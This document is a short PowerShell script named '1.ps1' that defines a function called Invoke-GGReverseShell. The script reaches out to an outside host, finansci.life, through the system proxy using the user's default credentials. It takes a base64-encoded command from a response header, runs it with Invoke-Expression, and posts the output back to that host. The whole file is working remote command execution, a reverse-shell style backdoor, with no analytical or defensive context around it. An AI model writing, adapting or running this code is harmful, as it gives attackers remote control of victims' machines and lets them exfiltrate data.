1.ps1

function Invoke-GGReverseShell 
{
$url = "http://finansci.life/p"
# handle proxies and used default creds if needed
$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
# add our header
$req.Headers.add('CMD','INITIAL')
$res = $req.GetResponse();
$x = $res.GetResponseHeader("CMD");
# decode base64
$d = [System.Convert]::FromBase64String($x);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);
# exec whatever we gave it (can be powershell or just shell commands)
$result = invoke-expression $Ds;
$b  = [System.Text.Encoding]::UTF8.GetBytes($result);
$hackgg = [System.Convert]::ToBase64String($b);
$res.Close();

$req = [System.Net.HttpWebRequest]::Create($url);
$proxy=[System.Net.WebRequest]::GetSystemWebProxy();
$proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials;
$req.proxy = $proxy
$req.Method = 'POST';
$Stream = $req.GetRequestStream();
$Stream.Write($b, 0, $b.Length);
$req.GetResponse();


}